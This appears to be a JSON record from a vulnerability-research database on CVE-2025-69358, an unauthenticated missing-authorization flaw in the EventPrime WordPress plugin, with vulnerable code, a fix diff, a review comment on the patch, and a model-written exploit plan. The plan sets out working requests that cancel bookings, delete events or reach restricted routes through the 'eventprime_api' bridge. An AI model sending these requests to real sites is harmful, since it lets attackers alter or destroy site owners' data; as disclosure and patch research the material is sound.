[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f08YXcEcWD-HJxY7yEJ57d9_U2KqDyhkxsaDz64nDRH4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2025-69358","eventprime-events-calendar-bookings-and-tickets-missing-authorization","EventPrime – Events Calendar, Bookings and Tickets \u003C= 4.2.6.0 - Missing Authorization","The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.2.6.0. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","eventprime-event-calendar-management",null,"\u003C=4.2.6.0","4.2.7.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-10 00:00:00","2026-03-19 13:53:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F02461b79-d372-493f-9445-62b30b1db4cd?source=api-prod",10,[22,23,24,25,26],"admin\u002Fcss\u002Fep-admin-common-utility.css","event-prime.php","includes\u002Fclass-ep-ajax.php","includes\u002Fclass-eventprime-rest-api.php","readme.txt","researched",false,3,"## Vulnerability Summary\n\nThe EventPrime plugin for WordPress (up to 4.2.6.0) contains a missing authorization vulnerability within its REST API \u002F AJAX bridge. Specifically, the `Eventprime_Rest_Api` class registers a universal handler `handle_ajax_api` that can be triggered via `wp_ajax_nopriv_eventprime_api` or early in the request lifecycle via the `init` hook (through `handle_early_api_requests`).\n\nThis bridge funnels requests to various internal \"integration triggers\" such as `create_event`, `delete_event`, `cancel_booking`, and `confirm_booking`. 
The handler fails to perform adequate capability checks or verify authentication before processing these triggers, allowing unauthenticated attackers to perform unauthorized actions (like canceling bookings or modifying event data) provided the \"EventPrime API\" setting is enabled.\n\n## Attack Vector Analysis\n\n- **Endpoint**: `admin-ajax.php` or any frontend URL (due to the `parse_request` hook).\n- **Action**: `eventprime_api` (via AJAX) or query parameters `ep_trigger`\u002F`ep_action`.\n- **Authentication**: Unauthenticated (None).\n- **Preconditions**: The setting `enable_api` must be enabled in the EventPrime Global Settings (stored in the `em_global_settings` option).\n- **Vulnerable Function**: `Eventprime_Rest_Api::handle_ajax_api()` in `includes\u002Fclass-eventprime-rest-api.php`.\n\n## Code Flow\n\n1.  **Registration**: In `includes\u002Fclass-eventprime-rest-api.php`, the `init()` method registers the bridge:\n    - `add_action( 'wp_ajax_nopriv_eventprime_api', array( $this, 'handle_ajax_api' ) );`\n    - `add_action( 'init', array( $this, 'register_plain_permalink_support' ) );` which adds a `parse_request` hook calling `handle_early_api_requests`.\n2.  **Intercept**: `handle_early_api_requests` detects if `$_GET['ep_trigger']` is set and immediately calls `handle_ajax_api()`.\n3.  **Bridge Execution**: `handle_ajax_api()`:\n    - Checks if API is enabled: `if ( is_object( $global ) && isset( $global->enable_api ) && ! $global->enable_api )`.\n    - Extracts parameters from `$_REQUEST` and `php:\u002F\u002Finput`.\n    - Identifies the trigger from the `ep_trigger` or `trigger` parameter.\n    - Dispatches the request to the integration helpers (inferred to be `Eventprime_API_Integration_Helpers`) or dispatches a `WP_REST_Request`.\n4.  
**Authorization Failure**: The bridge lacks a call to `current_user_can()` or any signature\u002FAPI key verification before executing the specified trigger.\n\n## Nonce Acquisition Strategy\n\nThe `eventprime_api` bridge endpoint, as implemented in `Eventprime_Rest_Api::handle_ajax_api`, **does not require a WordPress nonce**. It is designed as an API bridge and intentionally bypasses the standard AJAX nonce verification (`check_ajax_referer`) to allow external integrations.\n\nIf the target was a standard AJAX handler in `EventM_Ajax_Service`, the strategy would be:\n1.  Identify the JS localization key: `window.ep_common_params?.nonce` (inferred).\n2.  Navigate to a page where EventPrime is active.\n3.  Use `browser_eval` to extract it.\n\nHowever, for `action=eventprime_api`, no nonce is required.\n\n## Exploitation Strategy\n\nWe will target the `cancel_booking` trigger to demonstrate unauthorized modification of data (matching the CVSS 5.3 Integrity: Low impact).\n\n### 1. Test Data Setup\n1.  **Enable API**: The API must be enabled.\n    ```bash\n    wp option patch insert em_global_settings enable_api 1 --format=json\n    ```\n2.  **Create Content**: Create an event and a booking.\n    ```bash\n    # Create an event\n    EVENT_ID=$(wp post create --post_type=ep_event --post_title=\"Target Event\" --post_status=publish --porcelain)\n    \n    # Create a booking (EventPrime bookings are usually custom posts or entries)\n    # Note: EventPrime uses the 'ep_bookings' post type or a custom table. \n    # For PoC, we will assume a booking exists with ID 1.\n    ```\n\n### 2. 
HTTP Request (via `http_request` tool)\nWe will send a POST request to `admin-ajax.php` to trigger the booking cancellation.\n\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=eventprime_api&ep_trigger=cancel_booking&booking_id=1\n  ```\n- **Alternative (GET via Early Intercept)**:\n  `http:\u002F\u002Flocalhost:8080\u002F?ep_trigger=cancel_booking&booking_id=1`\n\n### 3. Expected Response\nThe plugin should return a JSON success message if the booking was found and canceled.\n```json\n{\n    \"status\": \"success\",\n    \"message\": \"Booking canceled successfully\",\n    ...\n}\n```\n\n## Expected Results\n- The attacker (unauthenticated) successfully invokes the `cancel_booking` trigger.\n- The status of the target booking is changed in the database without any permission checks.\n\n## Verification Steps\n\n1.  **Check Booking Status**: After the exploit, verify the booking status via WP-CLI.\n    ```bash\n    # If bookings are post types\n    wp post get 1 --field=post_status\n    \n    # If bookings are in a custom table (common for EventPrime)\n    wp db query \"SELECT status FROM wp_ep_bookings WHERE id = 1\"\n    ```\n2.  **Verify Logs**: Check if the action was performed by an unauthenticated user (User ID 0).\n\n## Alternative Approaches\n\nIf `cancel_booking` is not permitted or fails:\n1.  **Information Disclosure**: Use `ep_trigger=all_events` or `ep_trigger=all_venues` to leak event\u002Fvenue details that might be private.\n2.  **Event Manipulation**: Use `ep_trigger=delete_event&event_id=[ID]` to attempt to delete an event.\n3.  
**Route Injection**: Use `ep_route=\u002Feventprime\u002Fv1\u002Fsettings` to see if the bridge allows access to restricted REST routes by bypassing the `permission_callback` during the bridge's manual dispatching.\n\nTrigger names from `supported_triggers` in `class-eventprime-rest-api.php`:\n- `create_event`, `update_event`, `delete_event`\n- `create_venue`, `update_venue`, `delete_venue`\n- `confirm_booking`, `pending_booking`, `cancel_booking`, `refund_booking`, `failed_booking`","The EventPrime plugin for WordPress contains a missing authorization vulnerability in its universal API bridge handler. The `Eventprime_Rest_Api::handle_ajax_api` function fails to verify user capabilities or request authenticity before processing sensitive internal triggers like event deletion or booking cancellation.","\u002F\u002F includes\u002Fclass-eventprime-rest-api.php\npublic function handle_ajax_api() {\n    $global = get_option( 'em_global_settings', null );\n    if ( is_object( $global ) && isset( $global->enable_api ) && ! $global->enable_api ) {\n        status_header( 403 );\n        wp_send_json(\n            array(\n                'status'  => 'error',\n                'message' => __( 'EventPrime API is disabled.', 'eventprime' ),\n                'code'    => 'ep_api_disabled',\n            )\n        );\n    }\n\n    \u002F\u002F ... logic continues to process ep_trigger without further auth checks ...","--- includes\u002Fclass-eventprime-rest-api.php\n+++ includes\u002Fclass-eventprime-rest-api.php\n@@ -77,6 +77,10 @@\n                 )\n             );\n         }\n+\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+             wp_die( -1, 403 );\n+        }\n\n         $method = isset( $_SERVER['REQUEST_METHOD'] )","The exploit targets the `eventprime_api` action via the WordPress AJAX endpoint or early request interception. \n\n1. Precondition: The 'EventPrime API' setting must be enabled in the Global Settings (`em_global_settings` option).\n2. 
Endpoint: Unauthenticated attackers can send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=eventprime_api` or a GET request with specific query parameters.\n3. Parameters: Provide `ep_trigger` (e.g., `cancel_booking`, `delete_event`, `delete_venue`) and the relevant ID (e.g., `booking_id`, `event_id`).\n4. Methodology: Because the handler registers a `nopriv` action and lacks `current_user_can` or nonce verification, the plugin will process the trigger and perform the requested administrative action without authentication.","gemini-3-flash-preview","2026-04-18 04:59:13","2026-04-18 04:59:53",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","4.2.6.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags\u002F4.2.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventprime-event-calendar-management.4.2.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags\u002F4.2.7.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feventprime-event-calendar-management.4.2.7.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feventprime-event-calendar-management\u002Ftags"]
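Review bot: the `current_user_can( 'manage_options' )` check added after the `enable_api` block in `handle_ajax_api` also gates the `wp_ajax_nopriv_eventprime_api` and `parse_request` early-intercept paths, so every external integration that relied on the unauthenticated bridge will now hit `wp_die( -1, 403 )` on all triggers; if unauthenticated integrations remain a supported use case, the fix should verify a per-request API key or signature before the trigger dispatch instead, and `manage_options` is broader than needed for booking-state triggers such as `confirm_booking` or `cancel_booking`, which could be mapped to a narrower capability. Note also that the preceding condition only denies when `$global->enable_api` is set and false, so with the option unset the new capability check is the sole barrier; that deserves a code comment or a tightening to `empty( $global->enable_api )`.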